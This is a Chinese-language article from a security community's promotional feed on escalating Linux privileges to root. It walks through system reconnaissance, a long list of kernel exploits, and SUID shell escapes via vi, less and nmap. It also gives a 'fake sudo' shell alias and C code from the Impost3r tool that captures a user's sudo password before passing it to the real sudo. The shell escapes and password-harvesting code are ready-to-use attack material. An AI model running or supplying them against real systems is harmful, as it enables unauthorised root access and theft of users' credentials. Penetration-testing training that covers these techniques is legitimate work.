Linux提权全剧终

喜欢就关注我吧，订阅更多最新安全知识

文章来源｜MS08067 内网安全知识星球

本文作者：非正常接触（Ms08067内网安全小组成员）

内网纵横四海  认准Ms08067

这里介绍一些Linux提权（普通用户到root）手法。除了常见的内核漏洞、suid等提权手段外，还介绍一种通过伪装sudo命令来获取管理员口令的方法。

0x00 常⻅信息收集命令

命令	结果
uname -a	打印所有可⽤的系统信息
cat /proc/version	内核版本信息
cat /etc/*-release(issues)	Linux发行版本信息
df -a	文件系统信息
dpkg --list 2>/dev/null| grep compiler |grep  -v decompiler  2>/dev/null && yum list installed 'gcc*'  2>/dev/null| grep gcc  2>/dev/null	列出可用的编辑器
lpstat -a	查看是否有打印机
ps aux top cat /etc/service	查看进程相关信息
crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root	查看计划任务的相关信息
grep -i user [filename] grep -i pass [filename] grep -C 5 “password” [filename] find . -name “*.php” -print0 | xargs -0 grep -i -n “var $password”	查看可能具有⼝令的⽂件

0x01 sudo滥⽤提权

使⽤sudo -l命令可以查看当前⽤户允许执⾏的提权命令。

0x02  内核漏洞提权

Linux漏洞汇总（通过ExDB查找PoC）

发布时间	漏洞描述	发布作者
2019/12/16	Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds	Google Security Research
2019/10/24	Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)	Metasploit
2019/07/17	Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME	Google Security Research
2018/11/29	Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)	Metasploit
2018/11/16	Linux - Broken uid/gid Mapping for Nested User Namespaces	Google Security Research
2018/09/26	Linux Kernel - VMA Use- After-Free via Buggy vmacache_flush_all() Fastpath Local Privilege Escalation	Google Security Research
2018/08/03	Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)	Metasploit
2018/07/19	Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)	Metasploit
2018/07/10	Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation	rlarabee

2018/05/22	Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)	Metasploit
2018/05/21	Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)	Metasploit
2018/05/18	Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)	Metasploit
2017/08/13	Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)	Andrey Konovalov
2017/09/06	Tor (Linux) - X11 Linux Sandbox Breakout	Google Security Research
2017/05/22	VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation
2017/05/11	Linux Kernel 4.8.0-41- generic (Ubuntu) - Packet Socket Local Privilege Escalation	Andrey Konovalov
2016/11/27	Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)	Gabriele Bonacini
2016/11/28	Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)	FireFart
2016/11/14	Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)	Metasploit

2016/11/02	Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Local Privilege Escalation (Metasploit)	Metasploit
2016/10/21	Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)	Robin Verton
2016/10/19	Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)	Phil Oester
2016/10/11	Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)	Metasploit
2016/06/21	Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation	Google Security Research
2016/05/04	Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation	Google Security Research
2016/05/04	Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)	Google Security Research
2014/05/28	Linux Kernel 3.3.5 - '/drivers/media/media- device.c' Local Information Disclosure	Salva Peiro
2016/01/05	Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)	rebel
2013/06/07	Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation	Kees Cook

2015/10/15	Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass	soyer
2013/03/13	Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_F S' Local Privilege Escalation	Sebastian Krahmer
2012/10/09	Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure	Brad Spengler
2012/07/26	Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure	Jay Fenlason
2015/06/16	Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)
2015/06/16	Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation	rebel
2011/11/07	Linux Kernel 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure	Vasiliy Kulikov
2012/01/12	Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)	zx2c4
2014/10/20	Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)	Metasploit
2010/11/09	Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure	Dan Rosenberg

2010/05/18	Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass	Dan Rosenberg
2014/06/21	Linux Kernel 3.13 - SGID Privilege Escalation	Vitaly Nikolenko
2009/12/16	Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation	Tavis Ormandy
2009/11/09	Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation	Akira Fujita
2013/02/24	Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)	SynQ
2009/11/03	Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2)	teach & xipe
2009/11/03	Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)	teach & xipe
2009/03/02	Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass	Chris Evans
2009/02/20	Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure	Clément Lecigne
2014/02/02	Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)	saelo

2007/9/21	Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure	Karimo_DM
2007/9/21	Linux Kernel 2.6.x - Ptrace Privilege Escalation	Wojciech Purczynski
2007/03/05	Linux Kernel 2.6.17 - 'Sys_Tee' Local Privilege Escalation	Michael Kerrisk
2006/07/27	Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory	anonymous
2006/04/28	Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass	Marcel Holtmann
2006/04/28	Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass	Marcel Holtmann
2006/03/23	Linux Kernel 2.4.x/2.5.x/2.6.x - 'Sockaddr_In.Sin_Zero' Kernel Memory Disclosure	Pavel Kankovsky
2005/10/17	Linux Kernel 2.6 - Console Keymap Local Command Injection	Rudolf Polzer
2005/05/26	Linux Kernel 2.6.x - Cryptoloop Information Disclosure	Markku-JuhaniO. Saarinen
2005/10/19	Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Local Privilege Escalation	backdoored.net

2005/04/08	Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)	qobaiashi
2005/03/09	Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1)	sd
2004/04/23	Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Memory Read	Brad Spengler
2004/02/09	Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation	Martin Fiala
2004/02/06	Linux VServer Project 1.2x - Chroot Breakout	Markus Mueller
2003/10/06	SuSE Linux Professional 8.2 - SuSEWM Configuration File Insecure Temporary File	Nash Leon
2003/09/09	RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation	Jon Hart
2012/12/02	MySQL (Linux) - Database Privilege Escalation	kingcope
2003/06/26	Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read	IhaQueR
2003/06/20	Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure	IhaQueR

2003/06/16	Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation	Karol Wiesek
2003/02/18	Linux-ATM LES 2.4 - Command Line Argument Buffer Overflow	Angelo Rosiello
2003/04/04	Linux Kernel 2.2.x/2.4.x - I/O System Call File Existence	Andrew Griffiths
2003/04/10	Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2)	Wojciech Purczynski
2003/03/17	Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1)	anszom@v-lo.krakow.pl
2012/10/10	Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)	Metasploit
2002/08/28	Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (3)	syscalls
2002/08/28	Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (2)	David Endler
2002/08/28	Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (1)	RaiSe
2002/08/10	ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)	TESO Security

2002/08/10	ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)	Gobbles Security
2002/05/17	Grsecurity Kernel Patch 1.9.4 (Linux Kernel) - Memory Protection	Guillaume PELAT
2002/03/26	Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation	cliph
2002/02/25	Century Software Term For Linux 6.27.869 - Command Line Buffer Overflow	Haiku Hacker
2000/08/25	User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation	Andrew Griffiths
2001/11/21	SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Local Buffer Overflow	IhaQueR@IRCnet
2001/11/21	SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String	IhaQueR@IRCnet
2001/10/18	Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Privilege Escalation	Rafal Wojtczuk
2001/06/27	Linux Kernel 2.2/2.4 - procfs Stream redirection to Process Memory Privilege Escalation
2001/06/12	Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow	zen-parse

2001/05/13	Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / SuSE Linux 6.x/7.0/7.1 - 'Man -S' Heap Overflow	zenith parsec
2001/03/27	Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)	Wojciech Purczynski
2001/03/27	Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)	Wojciech Purczynski
2001/02/09	Linux Kernel 2.2.x - 'sysctl()' Memory Reading	Chris Evans
2000/11/30	Linux Kernel 2.2.x - Non- Readable File Ptrace Local Information Leak	Lamagra Argamal
2000/11/12	Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution	Michal Zalewski
2000/06/07	Linux Kernel 2.2.x 2.4.0- test1 (SGI ProPack 1.2/1.3) - Sendmail 8.10.1 Capabilities Privilege Escalation (2)	Wojciech Purczynski
2000/06/07	Linux Kernel 2.2.x 2.4.0- test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)	Florian Heinz
2000/05/29	Mandriva Linux Mandrake 7.0 - Local Buffer Overflow	noir
2000/05/22	S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (3)	WaR

2000/05/22	S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (2)	Scrippie
2000/05/22	S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (1)	Paulo Ribeiro
2012/07/19	Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit)	Metasploit
2000/05/03	RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout	Michal Zalewski
2000/04/29	SuSE Linux 6.3/6.4 Gnomelib - Local Buffer Overflow	bladi
2000/04/21	SuSE Linux 6.x - Arbitrary File Deletion	Peter_M
2000/04/10	Bray Systems Linux Trustees 1.5 - Long Pathname	Andrey E. Lerman
2000/03/16	Halloween Linux 4.0 / SuSE Linux 6.0/6.1/6.2/6.3 - 'kreatecd' Local Privilege Escalation	Sebastian
2000/03/13	Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (2)	S.Krahmer & Stealth
2000/03/13	Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (1)	funkysh

2000/03/11	AT Computing atsar_linux 1.4 - File Manipulation	S. Krahmer
2000/03/05	Oracle8i Standard Edition 8.1.5 for Linux Installer - Local Privilege Escalation	Keyser Soze
2000/03/02	Corel Linux OS 1.0 - Dosemu Distribution Configuration	suid
2000/02/26	RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (2)	Babcia Padlina
2000/02/26	RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (1)	Babcia Padlina
2000/02/24	Corel Linux OS 1.0 - 'setxconf' Local Privilege Escalation	suid
2000/02/24	Corel Linux OS 1.0 - buildxconfig	suid
2000/02/23	RedHat Linux 6.0 - Single User Mode Authentication	Darren Reed
2000/01/12	Corel Linux OS 1.0 - get_it PATH	Cesar Tascon Alvarez
2000/03/15	Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (2)	Elias Levy

⽐较常⽤的漏洞：

CVE-2016-5195: 脏⽜漏洞

CVE-2019-14287: sudo溢出漏洞

可以通过⾃动化脚本来匹配相关的内核漏洞：

https://github.com/rebootuser/LinEnum 
https://github.com/mzet-/linux-exploit-suggester

0x03 suid提权

suid允许⽤户在执⾏⽤户的许可下执⾏⽂件，创建和打开⽹络套接字⼀般需要root权限，但是为了⽅便使 ⽤，如Ping命令，通过设置Ping程序的suid，就可以允许低权限⽤户执⾏Ping程序时是以root权限执⾏。因此，如果⼀个程序中设置了suid，我们可以该程序⽣成的shell来提升权限。

查找suid和guid⽂件

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/n

ull

其它可⽤的命令

查找密钥或者证书:

find / -type f '(' -name .cert -or -name .crt -or -name .pem -or name .ca -or -name .p12 -or -name .cer -name *.der ')' '(' '(' -us er support -perm -u=r ')' -or '(' -group support -perm -g=r ')' -o r '(' -perm -o=r ')' ')' 2> /dev/null-or -name .cer -name .der ')' 2> /dev/nu

查找root拥有的suid⽂件

find / -uid 0 -perm -4000 -type f 2>/dev/null

例⼦

vi / vim

:set shell=/bin/sh
:shell

less

less /etc/passwd
!/bin/sh

nmap

nmap -interactive
! sh

0x04 伪造sudo

Linux下命令执⾏顺序可以由⽤户决定，如改变.bashrc中的环境变量信息，也可以给某命令增加⼀个别名 等。可以伪造⼀个sudo命令，让⽤户每次输⼊的⼝令都存储下来，达到提权的⽬的。这⾥推荐Impost3r项⽬

创建sudo别名

alias sudo='impost3r() {
if [ -f "/tmp/.impost3r" ]; then
/tmp/.impost3r "$@" && unalias sudo
else
unalias sudo;sudo "$@"
fi
}; impost3r'

impost3r核⼼代码

int pid = fork();
if (pid == 0)
{
successFlag = 0;
save_passwd(usrInfo->pw_name,originPasswd,allPasswd,1);
return allPasswd;
}
else
{
wait(NULL); // 防⽌⽤户执⾏的是⽆限循环服务，从⽽产⽣僵⼫进程
execv("/usr/bin/sudo",params);
exit(0);
}

将⽤户输⼊的⼝令信息先通过 save_passwd 存储下来，然后再调⽤真实的sudo命令。

0x05  其它提权⼿法

1.LXD提权

2.cronjob计划任务提权

3.NFS提权

4.⼝令爆破提权

扫描下方二维码加入星球学习

加入后邀请进入内部微信群，内部微信群永久有效！

 

 

目前36000+人已关注加入我们